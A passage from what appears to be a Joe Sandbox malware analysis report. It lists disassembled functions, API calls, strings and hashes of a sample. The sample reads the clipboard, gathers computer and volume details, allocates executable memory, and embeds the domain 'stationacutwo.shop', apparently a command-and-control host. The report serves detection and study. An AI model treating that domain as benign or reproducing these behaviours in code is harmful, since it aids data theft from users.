Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: df94cca0ce6bdc0e05b4024e12c547daaec5ef94e266d58cfc8991eef8773f34
Instruction ID: 2a24ab453b063afa7a8689a56f2f51f929f5c9e3ed0011153af5ecb657667a5e
Opcode Fuzzy Hash: df94cca0ce6bdc0e05b4024e12c547daaec5ef94e266d58cfc8991eef8773f34
Instruction Fuzzy Hash: 4FF1CD72A087449BD714DF28D88175BBBE1EB88304F04853EF995AB3C2D778E905CB86

Function 00416380 Relevance: 1.6, Strings: 1, Instructions: 377COMMON

Download Yara Rule

Strings

2fA, xrefs: 00416624

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 2fA
API String ID: 0-3939653067
Opcode ID: 99cd800d163d67b8347d408f5bd54de9590606cc6686f2e67a554cc252ad714f
Instruction ID: 6e87ad54de88920b9dc91c26a49410a5ce87ea97c590b2840975a0399f4ace3a
Opcode Fuzzy Hash: 99cd800d163d67b8347d408f5bd54de9590606cc6686f2e67a554cc252ad714f
Instruction Fuzzy Hash: 00910F76904201DBC7249F04DC926BB73B5FF86318F0A452EF88687391E338E944C79A

Function 00438180 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043AE3C,005C003F,00000006,?,?,00000018,B2B5B4B7,?,ZdA), ref: 004381A6

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 0041FF85 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7a58fd43d6a9bea96ebee46fc4f7f3595c1e4fe59dcd0031fea07064906405
Instruction ID: 4112d752c4675042c9f4d24d64b470d7a1d2ac2eba366108b29385767195248f
Opcode Fuzzy Hash: 4f7a58fd43d6a9bea96ebee46fc4f7f3595c1e4fe59dcd0031fea07064906405
Instruction Fuzzy Hash: 9122BC74600B02CFC325CF28D490A62F3F1FF4A700B958A9ED5868B762D775E995CB98

Function 0043B630 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0df8d556f82b5fa52f251aa705c6763cb6cec2b60cace41d306269008102590
Instruction ID: b363dca51ce9b49509a4814d49c578aaa114a8ed5c317b07c574f91d9f8079a9
Opcode Fuzzy Hash: f0df8d556f82b5fa52f251aa705c6763cb6cec2b60cace41d306269008102590
Instruction Fuzzy Hash: F781F371A083128BCB18DF18C890B6BB3E1EF89714F19892DE68197361D734AC11CBDA

Function 0041B260 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701eb2e98910b4c765e97ff29b6c5265a6f365aa9e8f875c3833441ecd2291da
Instruction ID: 84abbc84113cd253d1960b160f4c71acde79016d7e8c2a58b427b786811391ed
Opcode Fuzzy Hash: 701eb2e98910b4c765e97ff29b6c5265a6f365aa9e8f875c3833441ecd2291da
Instruction Fuzzy Hash: F441D1715083148BC7148F14D89169FB7F0EFC6368F048A2DF8A95B391E3789A45C7DA

Function 0042A44A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d73a3f6f43b8cd5716e36789ca69acfa64243595167bfdada45ff7ee3e3a7e
Instruction ID: ea47b46d9d554172c195231156708c2e28ac3cfc9c4fadd90a88fea462715d45
Opcode Fuzzy Hash: 90d73a3f6f43b8cd5716e36789ca69acfa64243595167bfdada45ff7ee3e3a7e
Instruction Fuzzy Hash: C5F08CB110A702CBC311CF25C54434BBBE2BBC4314F55982DD4954B385C778B649CB89

Function 028B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 028B024D

Strings

cess, xrefs: 028B018D
kernel32.dll, xrefs: 028B008F, 028B0095

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: d301cd66b26aba4188fd4b2d25201b37b6e351559830be95b28a82fba6a3bf83
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 4D527A78A01229DFDB65CF68C984BADBBB1BF09304F1480D9E54DAB351DB30AA85CF15

Function 0042714B Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00427276
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004272B9
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004273DB

Strings

2PBv, xrefs: 00427170
cfbe, xrefs: 004273E8

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: 2PBv$cfbe
API String ID: 2243422189-2258403321
Opcode ID: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction ID: d15ebabd98d3d14068800f9dbe7adda6ca9b2282baa7fc7a6769f676d58a1832
Opcode Fuzzy Hash: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction Fuzzy Hash: 7DF1BB70608F508ED725CF34D894BE3BBE1AF56305F484A9EC0EB8B292D779A405CB54

Function 0043409F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004340E2

Strings

:, xrefs: 004340A6
\, xrefs: 004340AD
C, xrefs: 0043409F

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: InformationVolume
String ID: :$C$\
API String ID: 2039140958-3809124531
Opcode ID: b57741232ffb6e73598f93c7f00eeeb02a7603dbf45da60c52946d2d023c1752
Instruction ID: 2590a99ba3b0c72c7e66251d0ec347311e8f8f9194a99d63403cb4ce77094994
Opcode Fuzzy Hash: b57741232ffb6e73598f93c7f00eeeb02a7603dbf45da60c52946d2d023c1752
Instruction Fuzzy Hash: D6F06574294301ABE314CF10DC17F1A72B0EF4670CF20892DB285EA2D0D7B9A914CB5E

Function 0040AD50 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 885COMMON

Download Yara Rule

APIs

GetProcessVersion.KERNEL32 ref: 0040B293

Strings

stationacutwo.shop, xrefs: 0040B213, 0040B86F

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProcessVersion
String ID: stationacutwo.shop
API String ID: 2384128931-2554180252
Opcode ID: 6f7b548df94495d0e15a444555eef13361a26715962b504aeb552c437f3e21af
Instruction ID: cfb45cb272add0a556381fbbfeda1cdcc5bc5d21a2f16fa5a30a80d125961872
Opcode Fuzzy Hash: 6f7b548df94495d0e15a444555eef13361a26715962b504aeb552c437f3e21af
Instruction Fuzzy Hash: 8B926B70508B81CFD325DF38C444716BFE1AB56314F1886ADD4DA8B3E2D379A486CB9A

Function 00409C50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00409CAB

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00409C7B

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ExitProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 621844428-780655312
Opcode ID: e445ea224c7f5f9d20ce95abbf24a35e36d12e594bc5c45f363e9ccd3e65d695
Instruction ID: e011a743a575bc7d175a59a8ee7ea00b174ccc4e63c700a3dd24194b3452eabb
Opcode Fuzzy Hash: e445ea224c7f5f9d20ce95abbf24a35e36d12e594bc5c45f363e9ccd3e65d695
Instruction Fuzzy Hash: AAF01570C0C204C9EA20BB72824A66DB6D45F25348F10193FF9C6712D3DA3D8C06961F

Function 028B0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,028B0223,?,?), ref: 028B0E19
SetErrorMode.KERNELBASE(00000000,?,?,028B0223,?,?), ref: 028B0E1E

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 16e957cdb4a21dfa7f1d08acfc56f7bcca57be210dfda960b3ac476371c6f03d
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A9D0123914512877D7012A94DC09BCE7B1CDF05B66F008011FB0DD9180C770954046E5

Function 0042BEB5 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042BFC0

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: f2fc0ede1abc15ec2dd2f12e8828292f2aa3a96730a176a61e16883aafe3e80b
Instruction ID: 9afc8dc3159de63cfa5fca5a0affec39bb654b5632ddb90e03a39c80125b271e
Opcode Fuzzy Hash: f2fc0ede1abc15ec2dd2f12e8828292f2aa3a96730a176a61e16883aafe3e80b
Instruction Fuzzy Hash: FF516A70108B828ED325CF2CC544742FFE1BF96314F48869DD0EA8B792C774A589CB92

Function 004380CA Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00438149

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eb6943abcd4e56cea1d11ed8e7b53dbd39a21d58b1a95ec35a1256948ab1f043
Instruction ID: e14af565a0c615a7b28f3c9094f3ace374284610f986dea6898fd892b6e8c086
Opcode Fuzzy Hash: eb6943abcd4e56cea1d11ed8e7b53dbd39a21d58b1a95ec35a1256948ab1f043
Instruction Fuzzy Hash: E4112C366053808FD71A8F18DCA19A4FBB2EFDA310729049FD1C587293CB396C16CB54

Function 0043603F Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00436087

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9ca839f80c1904635c995e62e09cd20c8094038639c08bcf89c553a4c64d1a17
Instruction ID: a94989cabf76012165cf56b6457c58ff1dbdea88eacffe18d49513b8a1f6e70c
Opcode Fuzzy Hash: 9ca839f80c1904635c995e62e09cd20c8094038639c08bcf89c553a4c64d1a17
Instruction Fuzzy Hash: 49013C342492818FD729CF14D990A167BB3EFDF70973A86ADC1D107B6AC235A812CB94

Function 00437D4A Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000000,00000800), ref: 00437D68

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f39e2d20ee2b5a25ab3e6fc8db6ee475dc9a1fc7e29fea4d11f84a8ed548eca4
Instruction ID: 5b231e06ead02ded7a5862b21f392a61b61d73390fd841d62513dec36869542d
Opcode Fuzzy Hash: f39e2d20ee2b5a25ab3e6fc8db6ee475dc9a1fc7e29fea4d11f84a8ed548eca4
Instruction Fuzzy Hash: E7D067383807009BE1689B25EC91F16B266ABD6A00F31C919E14666AD486B0B4055A49

Function 00437FE0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 00437FE0

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 8bacdd1a854ec9a57f8760d773d8a30e75d4ce186afb8feb54302bbf69a49313
Instruction ID: ab89375f5921908170439047bb91253a411584663df88da37cc81a179c41e8dd
Opcode Fuzzy Hash: 8bacdd1a854ec9a57f8760d773d8a30e75d4ce186afb8feb54302bbf69a49313
Instruction Fuzzy Hash: 30E0AEB1600B008FD7A0CF2AD982A16B7E1BB48608754292EE5869BB51D330F800CF48

Function 02AC20B5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02AC2106

Memory Dump Source

Source File: 00000000.00000002.2156496909.0000000002AC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac1000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: fb5d7fe9ae8382871d78e80478e708f0eeca1fc35b57b1fc251ada7432081609
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 79113C79A40208EFDB01DF98CA85E98BBF5AF08350F158094FA489B361D771EA90DF90

Non-executed Functions

Function 0042E590 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 127clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042E5AD
GetWindowLongW.USER32 ref: 0042E5D0
GetClipboardData.USER32 ref: 0042E5E4
GlobalLock.KERNEL32 ref: 0042E609
GlobalUnlock.KERNEL32 ref: 0042E73B
CloseClipboard.USER32 ref: 0042E748

Strings

c, xrefs: 0042E684
W, xrefs: 0042E66B
a, xrefs: 0042E670
l, xrefs: 0042E689
P, xrefs: 0042E675
n, xrefs: 0042E67F
b, xrefs: 0042E666
[, xrefs: 0042E657
c, xrefs: 0042E65C
!, xrefs: 0042E652
V, xrefs: 0042E661

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: !$P$V$W$[$a$b$c$c$l$n
API String ID: 2832541153-442629251
Opcode ID: 7e12f9de1543f7934be25ee7d982225b7564dd2d07d77fb89e709f99be6f3000
Instruction ID: cb050f0fbfe2ccbf41b8d1e2de91d2715b77496d9b2bc792e36e077a2e6e7693
Opcode Fuzzy Hash: 7e12f9de1543f7934be25ee7d982225b7564dd2d07d77fb89e709f99be6f3000
Instruction Fuzzy Hash: D651577150C3908FD301EF29D44831EBFE0AB95308F440A2EF4D997292D7799949CBAB

Function 028BA8C7 Relevance: 23.0, Strings: 18, Instructions: 467COMMON

Download Yara Rule

Strings

", xrefs: 028BAB88
P!D', xrefs: 028BADAE
YC, xrefs: 028BAADB, 028BAB64
VU, xrefs: 028BAE3A
0, xrefs: 028BA93D
%]kS, xrefs: 028BAE24
z1{7, xrefs: 028BADD7
3A%G, xrefs: 028BAE03
>M(C, xrefs: 028BADF8
)N/, xrefs: 028BAD9E
hvkg, xrefs: 028BA9FF
AQNW, xrefs: 028BAE2F
9E?[, xrefs: 028BAE0E
de, xrefs: 028BAEE6
R5OK, xrefs: 028BADE2
A%R;, xrefs: 028BADB6
X=G3, xrefs: 028BADCC
,Y._, xrefs: 028BAE19

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: )N/$"$%]kS$,Y._$0$3A%G$9E?[$>M(C$A%R;$AQNW$P!D'$R5OK$VU$X=G3$YC$de$hvkg$z1{7
API String ID: 0-4040250002
Opcode ID: 70b56d956f6eaf4704e27b460a06c1e1e7aea07bb1cd0fd247906e868684cc14
Instruction ID: 361b432768982f0397cf4b4b434cd490453c21fb98a59eba4a9091f986d36a9f
Opcode Fuzzy Hash: 70b56d956f6eaf4704e27b460a06c1e1e7aea07bb1cd0fd247906e868684cc14
Instruction Fuzzy Hash: 7F0244B9208381ABD318CF24C590BAFBBE2AFC5708F54992DE4D98B391D774D805CB56

Function 00401FA0 Relevance: 13.0, Strings: 10, Instructions: 492COMMON

Download Yara Rule

Strings

., xrefs: 00402049
0, xrefs: 00402043
K, xrefs: 00402690
WMs, xrefs: 0040232D
., xrefs: 0040206E
[, xrefs: 00402208
null, xrefs: 0040224E
false, xrefs: 00402131
{, xrefs: 00402305
true, xrefs: 00402119

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: .$.$0$WMs$[$false$null$true${$K
API String ID: 0-107743826
Opcode ID: b4261b06dba8f004db469e5a013620940a70f41516a74b55eb1c39dc16a1747c
Instruction ID: f142902fa1e6ce3baae2cc86dbd04551ffeb3ddbe79eb06f544bf6df4934ce3d
Opcode Fuzzy Hash: b4261b06dba8f004db469e5a013620940a70f41516a74b55eb1c39dc16a1747c
Instruction Fuzzy Hash: DAF101B0900305ABD7105F21DE4D727BAE4AF50308F19893EE985A73D2E7BED914CB5A

Function 028C0BB7 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

stationacutwo.shop, xrefs: 028C0FCB
IV, xrefs: 028C0EB6
BG, xrefs: 028C0EC4
YC, xrefs: 028C0CA9
]_, xrefs: 028C0E31
O], xrefs: 028C0EBD
MJK, xrefs: 028C0CC9
(P, xrefs: 028C0EAF

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: (P$BG$IV$MJK$O]$YC$stationacutwo.shop$]_
API String ID: 0-3710986456
Opcode ID: cfb8866de550451c46bd9c7a1d9a60ed1e3cd9b4b701d34c72d781ac8ea03cd9
Instruction ID: 1dc414cb08bd8be95c40579aa0ee6d0e237a081c54f1f84bfb55caa0e7b10bfe
Opcode Fuzzy Hash: cfb8866de550451c46bd9c7a1d9a60ed1e3cd9b4b701d34c72d781ac8ea03cd9
Instruction Fuzzy Hash: B7D19E78104781CFD729CF29C490B22BBE2FF5A348B28855DC5D68B756C73AE846CB94

Function 028C8EB7 Relevance: 9.2, Strings: 7, Instructions: 425COMMON

Download Yara Rule

Strings

;I9W, xrefs: 028C8ED1
Bmrs, xrefs: 028C92FF
!, xrefs: 028C90F1
QS, xrefs: 028C90CD
$]&[, xrefs: 028C8EE9
xy, xrefs: 028C8F35
Lm5k, xrefs: 028C8F09

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: !$$]&[$;I9W$Bmrs$Lm5k$xy$QS
API String ID: 0-3575319576
Opcode ID: 8c15867198181c1f2924db7d24c583630b302ca9443fdb6cc0363a8ed121a76f
Instruction ID: a1b8b1456a9a0384b90d27caa623db64507b394e95a52ba10a6927927da7ef2b
Opcode Fuzzy Hash: 8c15867198181c1f2924db7d24c583630b302ca9443fdb6cc0363a8ed121a76f
Instruction Fuzzy Hash: 84C176B95083018BC714CF08C89166AB7F1FF85768F198A5CE8DA9B391E374E905CB92

Function 028C02A6 Relevance: 9.1, Strings: 7, Instructions: 394COMMON

Download Yara Rule

Strings

stationacutwo.shop, xrefs: 028C06F8
2]'_, xrefs: 028C0675
6)<w, xrefs: 028C0452
wt4e, xrefs: 028C0444
YC, xrefs: 028C041A
i~}n, xrefs: 028C043D
qg+#, xrefs: 028C044B

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 2]'_$6)<w$YC$i~}n$qg+#$stationacutwo.shop$wt4e
API String ID: 0-3386725333
Opcode ID: 50c42c1d84becb0313461bc77338cf0aedad803e3c412e3272055ea1d0b97813
Instruction ID: 2be6f0844eb017220645bc706ef9b3ab267f4eba1499e706c47934c5f2f8689a
Opcode Fuzzy Hash: 50c42c1d84becb0313461bc77338cf0aedad803e3c412e3272055ea1d0b97813
Instruction Fuzzy Hash: 43D17AB4504781CFD724CF29C495722BBF1BF46244F248A9CE8E68B796E331E845CB85

Function 0040CBCC Relevance: 8.8, Strings: 7, Instructions: 92COMMON

Download Yara Rule

Strings

mAo, xrefs: 0040CBE6
vY[, xrefs: 0040CD9F
-ac, xrefs: 0040CBD1
a1c3, xrefs: 0040CD3B
W%G', xrefs: 0040CD6D
N)K+, xrefs: 0040CD77
]^_, xrefs: 0040CDA9

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ]^_$mAo$-ac$N)K+$W%G'$a1c3$vY[
API String ID: 0-3936688744
Opcode ID: 63636f266ec569c27e36e02182617082bf3d66d7ca6434eabc7f1d19dc33352b
Instruction ID: 96cd1cd91511fc02f7d5853dfd94581ecd6a69b542adb32c7fbb0ed3e3133148
Opcode Fuzzy Hash: 63636f266ec569c27e36e02182617082bf3d66d7ca6434eabc7f1d19dc33352b
Instruction Fuzzy Hash: 5F51C7B4115B809FE2348F26E890B96BBB1BB56744F608E0DC2EB2BB55C734A045CF94

Function 028D6357 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

5SZ, xrefs: 028D6543
YC, xrefs: 028D64F7
JJ]T, xrefs: 028D652F
AHO:, xrefs: 028D6525

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: AHO:$JJ]T$YC$5SZ
API String ID: 0-2490005371
Opcode ID: 93c61705f7cfdb66d6f95be42a6a0ae56f1579dd11871bcce3060bb6590f76c2
Instruction ID: baec83847e8095c8234a814f426e88b9f50ec6cc8dcb2cd27601c70fa55b082d
Opcode Fuzzy Hash: 93c61705f7cfdb66d6f95be42a6a0ae56f1579dd11871bcce3060bb6590f76c2
Instruction Fuzzy Hash: F1917BB8104B508BD326CF35D4A4793BBE2BF8A304F184A4CC0EB0B296C7767119CB95

Function 004260F0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

JJ]T, xrefs: 004262C8
5SZ, xrefs: 004262DC
AHO:, xrefs: 004262BE
YC, xrefs: 00426290

Memory Dump Source

